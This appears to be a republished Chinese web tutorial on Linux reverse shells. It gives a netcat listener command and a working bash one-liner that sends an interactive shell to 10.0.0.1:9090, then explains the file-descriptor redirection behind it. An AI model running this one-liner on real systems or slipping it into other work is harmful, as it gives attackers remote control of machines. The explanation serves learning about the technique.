RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:8:30-17:00
你可能遇到了下面的问题
关闭右侧工具栏

新闻中心

这里有您想知道的互联网营销解决方案
Linux的反弹shell命令的解析

这篇文章主要介绍“Linux的反弹shell命令的解析”,在日常操作中,相信很多人在Linux的反弹shell命令的解析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Linux的反弹shell命令的解析”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!

专注于为中小企业提供网站建设、做网站服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业壶关免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了千余家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。

1. 什么是反弹shell

简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。

2. 反弹shell的用途

这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙

3. 反弹shell操作步骤

3.1. 在本机开启端口9090

nc -lk 9090

3.2. 在需要被控制的机器上执行如下两种命令中的一种即可

bash -i >& /dev/tcp/10.0.0.1/9090 0>&1

3.3. 在本机刚才执行nc -lk 9090命令行下面输入需要被控制的主机的命令即可

Linux的反弹shell命令的解析

4. 原理

  1. A主机开启9090端口的tcp服务

  2. B主机连接到A主机的9090的tcp服务

  3. A主机通过tcp服务把命令发到B主机

  4. B主机读取命令并且在bash中执行

  5. B主机把执行结果发给A主机

这样就可以在A主机中'玩弄'B主机了

下面重点来了

我们看这个操作其实还是蛮简单的,但是我们不能只局限于表面。我们需要去了解它的原理

其实nc -lk 9090命令没什么可说的,百度google一搜就出来了。我们今天要去解释的是bash -i >&  /dev/tcp/10.0.0.1/9090 0>&1。这条命令在google也没搜出来什么结果。所以只能自己加夜班搞了。

inux shell下常用的文件描述符是:

  1. 标准输入 (stdin) :代码为 0 ,使用 < 或 << ;

  2. 标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

  3. 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。

首先我们把这个命令拆解一下

bash -i # 这个也不知道说啥  >& # 这条命令 其实就是把stderr也输入到 stdout。它相当于 `> xxx 2>&1`  /dev/tcp/10.0.0.1/9090 # 这个就是连接到10.0.0.1的9090端口  0>&1 # 这个在google百度上查了半天也没搞懂,只能去研究文档

其实前面3个命令组合在一起很好理解,就是把这个bash下的所有输出都发送到 10.0.0.1:9090。这个大家可以自己操作一下,去掉后面的  0>&1。

我们在命令里面写  2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我们看下文件描述符

Linux的反弹shell命令的解析

这里看到的是2>&1就是把文件描述符2对应的设备改成了文件描述符1对应的设备。那么同理 0>&1就是把  0对应的设备改成的1对应的设备,那也就是socket。这就表明了  stdin就是从socket中读取数据,然后再执行命令,把bash的命令行返回内容通过stdout发到socket。

其实这些内容都可以在bash的man pages里面找到

Linux的反弹shell命令的解析

文档里面写的很清楚 n<&word 是吧word复制给n, n>&word是吧word复制给n。

所以这里写 0<&1 或者是 0>&1都是可以的,只要把文件描述符1对应的设备复制给文件描述符0就可以了

到此,关于“Linux的反弹shell命令的解析”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注创新互联网站,小编会继续努力为大家带来更多实用的文章!


标题名称:Linux的反弹shell命令的解析
本文来源:http://scpingwu.com/article/ihghce.html